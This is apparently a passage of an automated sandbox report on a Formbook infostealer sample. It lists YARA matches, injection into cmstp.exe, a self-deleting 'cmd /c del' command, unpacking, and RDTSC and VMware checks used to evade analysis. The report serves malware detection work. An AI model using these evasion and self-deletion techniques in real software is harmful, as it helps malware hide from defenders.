          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045E0D204_2_045E0D20
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B25DD4_2_046B25DD
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FD5E04_2_045FD5E0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046125814_2_04612581
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_04606E304_2_04606E30
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046AD6164_2_046AD616
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B2EF74_2_046B2EF7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B1FF14_2_046B1FF1
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046BDFCE4_2_046BDFCE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046BE8244_2_046BE824
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A10024_2_046A1002
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B28EC4_2_046B28EC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046120A04_2_046120A0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B20A84_2_046B20A8
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045FB0904_2_045FB090
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046041204_2_04604120
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_045EF9004_2_045EF900
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0469FA2B4_2_0469FA2B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B22AE4_2_046B22AE
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460AB404_2_0460AB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046B2B284_2_046B2B28
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046A03DA4_2_046A03DA
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_046ADBD24_2_046ADBD2
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461EBB04_2_0461EBB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00408C5B4_2_00408C5B
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00408C604_2_00408C60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B5694_2_0041B569
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00402D874_2_00402D87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00402D904_2_00402D90
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041CEAF4_2_0041CEAF
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00402FB04_2_00402FB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B7B54_2_0041B7B5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: String function: 00419F70 appears 36 times
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: String function: 00A7B150 appears 45 times
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: String function: 045EB150 appears 48 times
          Source: TazxfJHRhq.exe, 00000000.00000003.211457812.000000001F016000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TazxfJHRhq.exe
          Source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameCMSTP.EXE` vs TazxfJHRhq.exe
          Source: TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs TazxfJHRhq.exe
          Source: TazxfJHRhq.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/3@15/13
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004041E5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004041E5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004020A6 CoCreateInstance,MultiByteToWideChar,0_2_004020A6
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5320:120:WilError_01
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeFile created: C:\Users\user\AppData\Local\Temp\nsf9EB.tmpJump to behavior
          Source: TazxfJHRhq.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: TazxfJHRhq.exeVirustotal: Detection: 14%
          Source: TazxfJHRhq.exeReversingLabs: Detection: 25%
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeFile read: C:\Users\user\Desktop\TazxfJHRhq.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess created: C:\Users\user\Desktop\TazxfJHRhq.exe 'C:\Users\user\Desktop\TazxfJHRhq.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe'Jump to behavior
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: Binary string: cmstp.pdbGCTL source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdbUGP source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: TazxfJHRhq.exe, cmstp.exe
          Source: Binary string: cmstp.pdb source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeUnpacked PE file: 1.2.TazxfJHRhq.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041C828 push dword ptr [2E33947Ah]; ret 1_2_0041C827
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004059F2 push es; retf 1_2_004059FC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B3B5 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B46C push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B402 push eax; ret 1_2_0041B408
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041B40B push eax; ret 1_2_0041B472
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041C5C7 push dword ptr [2E33947Ah]; ret 1_2_0041C827
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_0041AE23 push ecx; retf 1_2_0041AE24
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00414F4E pushad ; retf 1_2_00414F51
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00ACD0D1 push ecx; ret 1_2_00ACD0E4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041C828 push dword ptr [2E33947Ah]; ret 1_1_0041C827
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_004059F2 push es; retf 1_1_004059FC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041B3B5 push eax; ret 1_1_0041B408
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041B46C push eax; ret 1_1_0041B472
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041B402 push eax; ret 1_1_0041B408
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041B40B push eax; ret 1_1_0041B472
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041C5C7 push dword ptr [2E33947Ah]; ret 1_1_0041C827
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_1_0041AE23 push ecx; retf 1_1_0041AE24
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0463D0D1 push ecx; ret 4_2_0463D0E4
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041C828 push dword ptr [2E33947Ah]; ret 4_2_0041C827
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_004059F2 push es; retf 4_2_004059FC
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B3B5 push eax; ret 4_2_0041B408
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B46C push eax; ret 4_2_0041B472
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B402 push eax; ret 4_2_0041B408
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041B40B push eax; ret 4_2_0041B472
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041C5C7 push dword ptr [2E33947Ah]; ret 4_2_0041C827
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0041AE23 push ecx; retf 4_2_0041AE24
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_00414F4E pushad ; retf 4_2_00414F51
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeFile created: C:\Users\user\AppData\Local\Temp\nsf9EC.tmp\i9y7dp4bi0ysdq.dllJump to dropped file
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Windows\explorer.exe TID: 6060Thread sleep time: -70000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 5400Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,0_2_00405301
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,0_2_00405C94
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_004026BC FindFirstFileA,0_2_004026BC
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
          Source: explorer.exe, 00000003.00000000.232858915.0000000008640000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000002.488941796.00000000055D0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
          Source: explorer.exe, 00000003.00000000.233000722.000000000871F000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000003.00000000.233065923.00000000087D1000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00ices
          Source: explorer.exe, 00000003.00000000.225935087.0000000005603000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
          Source: explorer.exe, 00000003.00000000.233222059.00000000088C3000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}1SPS0
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.230841942.0000000008220000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_004088B0 rdtsc 1_2_004088B0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00409B20 LdrLoadDll,1_2_00409B20
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_73791000 Ivlfdpdlcleoxmzl,IsDebuggerPresent,DebugBreak,GetTempPathW,lstrcatW,CreateFileW,GetFileSize,VirtualAlloc,ReadFile,0_2_73791000
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_00401FDC SetErrorMode,GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_00401FDC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_0267166E mov eax, dword ptr fs:[00000030h]0_2_0267166E
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 0_2_02671886 mov eax, dword ptr fs:[00000030h]0_2_02671886
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB90AF mov eax, dword ptr fs:[00000030h]1_2_00AB90AF
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA20A0 mov eax, dword ptr fs:[00000030h]1_2_00AA20A0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAF0BF mov ecx, dword ptr fs:[00000030h]1_2_00AAF0BF
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h]1_2_00AAF0BF
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAF0BF mov eax, dword ptr fs:[00000030h]1_2_00AAF0BF
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A79080 mov eax, dword ptr fs:[00000030h]1_2_00A79080
